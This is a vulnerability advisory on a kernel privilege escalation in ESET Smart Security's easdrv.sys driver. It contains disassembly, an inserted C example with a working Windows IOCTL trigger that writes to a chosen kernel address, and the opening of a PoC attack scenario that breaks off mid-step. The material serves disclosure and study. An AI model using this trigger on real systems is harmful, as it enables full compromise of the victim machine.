-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - Orange Bat advisory -

Name      : ESET Smart Security 3.0.667.0
Class     : Privilege escalation
Published : 2008-08-14
Credit    : g_ (g_ # orange-bat # com)

- - Details -

File: easdrv.sys

.text:00012B92 loc_12B92:
.text:00012B92                 push    [ebp+InputBuf]
.text:00012B95                 call    ds:off_1A200[eax]
.text:00012B9B                 mov     ecx, [ebp+OutputBuffer]
.text:00012B9E                 mov     [ecx], eax

Although this piece of code is wrapped in an exception handler, the input
and output pointers are never validated with ProbeForRead/ProbeForWrite.
Pointing the input or output buffer at kernel-mode memory (above
0x80000000) therefore causes a BSOD.

This code can be reached by sending IoControlCode = 0x222003 to the
device \\.\\easdrv (see POC). In order to exploit this, we need to take
a look at

.text:00012B95                 call    ds:off_1A200[eax]

off_1A200 is:

.rdata:0001A200 off_1A200       dd offset HookNtClose
.rdata:0001A204                 dd offset sub_12838
.rdata:0001A208                 dd offset sub_12874
.rdata:0001A20C                 dd offset sub_128A8
.rdata:0001A210                 dd offset sub_128E4
.rdata:0001A214                 dd offset sub_1290A
.rdata:0001A218                 dd offset sub_1292C

.
.
.

These are wrappers for the hooked syscalls. The first one is NtClose, so
there aren't many possible values this API can return in eax. We will use:

C0000008  STATUS_INVALID_HANDLE  An invalid HANDLE was specified.

Because it's the simplest status to get.

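The following is an added example; it is not code from the advisory or from its POC. It models the primitive described in the Details section: decoding IoControlCode 0x222003, which shows it is a METHOD_NEITHER request, so the I/O manager hands easdrv the raw user pointers and the driver alone is responsible for ProbeForRead/ProbeForWrite; a model of the ProbeForWrite check the driver omitted; and the little-endian layout of STATUS_INVALID_HANDLE when mov [ecx], eax stores it at an attacker-chosen OutputBuffer. The Windows-only send_easdrv_ioctl() is the trigger. Assumptions (not from the advisory): the address X and the prologue bytes are placeholders, the input buffer is assumed to carry the handle argument of the hooked NtClose (a bogus handle, so it returns STATUS_INVALID_HANDLE), and MmUserProbeAddress is taken as 0x7FFF0000, the x86 default without /3GB.

```c
/* Added example, not code from the advisory or its POC. Portable parts
 * build anywhere; the trigger at the bottom is Windows-only (_WIN32). */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define EASDRV_IOCTL            0x222003u   /* IoControlCode from the advisory */
#define STATUS_INVALID_HANDLE   0xC0000008u /* what the hooked NtClose returns in eax */

/* CTL_CODE layout: DeviceType<<16 | Access<<14 | Function<<2 | Method. */
struct ioctl_fields { unsigned device, access, function, method; };
#define METHOD_NEITHER 3u

struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device   = (code >> 16) & 0xFFFFu;
    f.access   = (code >> 14) & 0x3u;
    f.function = (code >> 2)  & 0xFFFu;
    f.method   = code & 0x3u;
    return f;
}

/* Model of the check easdrv skipped. With METHOD_NEITHER the I/O manager
 * hands the driver the raw user pointers unvalidated, so the driver must
 * probe them itself. ProbeForWrite raises STATUS_DATATYPE_MISALIGNMENT for
 * a misaligned pointer and STATUS_ACCESS_VIOLATION when the range reaches
 * kernel space. Assumption: MmUserProbeAddress = 0x7FFF0000 (x86 default
 * without /3GB). Returns 0 if the write would be allowed, otherwise the
 * NTSTATUS the real probe would raise. */
#define MM_USER_PROBE_ADDRESS        0x7FFF0000u
#define STATUS_DATATYPE_MISALIGNMENT 0x80000002u
#define STATUS_ACCESS_VIOLATION      0xC0000005u

uint32_t probe_for_write(uint32_t address, uint32_t length, uint32_t alignment)
{
    if (length == 0)
        return 0;
    if (address & (alignment - 1))
        return STATUS_DATATYPE_MISALIGNMENT;
    if (address + length > MM_USER_PROBE_ADDRESS || address + length < address)
        return STATUS_ACCESS_VIOLATION;
    return 0;
}

/* mov [ecx], eax is a little-endian 4-byte store: 0xC0000008 lands as
 * 08 00 00 C0. code[] is a snapshot starting at OutputBuffer; write_off is
 * where the store hits within it. The snapshot is patched in place. */
void apply_primitive(uint8_t *code, size_t code_len, size_t write_off, uint32_t value)
{
    for (size_t i = 0; i < 4 && write_off + i < code_len; i++)
        code[write_off + i] = (uint8_t)(value >> (8 * i));
}

#ifdef _WIN32
#include <windows.h>
/* The trigger: IoControlCode 0x222003 to \\.\easdrv with OutputBuffer =
 * target. Assumption: the input buffer carries the handle argument of the
 * hooked NtClose, so a bogus handle yields STATUS_INVALID_HANDLE. Returns 0
 * on success, -1 if the device cannot be opened, else GetLastError(). */
int send_easdrv_ioctl(uintptr_t target)
{
    HANDLE dev = CreateFileA("\\\\.\\easdrv", GENERIC_READ | GENERIC_WRITE, 0,
                             NULL, OPEN_EXISTING, 0, NULL);
    if (dev == INVALID_HANDLE_VALUE)
        return -1;
    HANDLE bogus = (HANDLE)(uintptr_t)0xDEADBEEFu;   /* assumed input layout */
    DWORD ret = 0;
    BOOL ok = DeviceIoControl(dev, EASDRV_IOCTL, &bogus, sizeof bogus,
                              (LPVOID)target, sizeof(uint32_t), &ret, NULL);
    CloseHandle(dev);
    return ok ? 0 : (int)GetLastError();
}
#endif

int main(void)
{
    struct ioctl_fields f = decode_ioctl(EASDRV_IOCTL);
    printf("IOCTL %#x: device %#x, function %#x, method %u%s\n", EASDRV_IOCTL,
           f.device, f.function, f.method,
           f.method == METHOD_NEITHER ? " (METHOD_NEITHER)" : "");

    /* Constructed: X stands in for the syscall handler address; the bytes
     * are a placeholder prologue, not real ntoskrnl code. code[1] is X. */
    uint32_t X = 0x80501234u;
    uint8_t code[8] = { 0x90, 0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x90, 0x90 };
    printf("probe(X-1) = %#x, probe(X) = %#x\n",
           (unsigned)probe_for_write(X - 1, 4, 4), (unsigned)probe_for_write(X, 4, 4));
    apply_primitive(code, sizeof code, 0, STATUS_INVALID_HANDLE);
    printf("bytes at X..X+2 after the store: %02X %02X %02X\n", code[1], code[2], code[3]);
    return 0;
}
```

The probe model shows both reasons a correct handler would have rejected the OutputBuffer used in the attack: X-1 lies above MmUserProbeAddress, and it is not 4-byte aligned, so either check alone would have stopped the write before mov [ecx], eax.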
Page 1/5
ESET Smart Security 3.0.667.0 Privilege Escalation PoC
g_
08/16/2008
Attack scenario:

1. Get the address of some rarely used syscall, like NtShutdownSystem.
   I will refer to this address as X :p
2. Send the IOCTL to easdrv with output buffer = X-1. This will result
   in overwriting two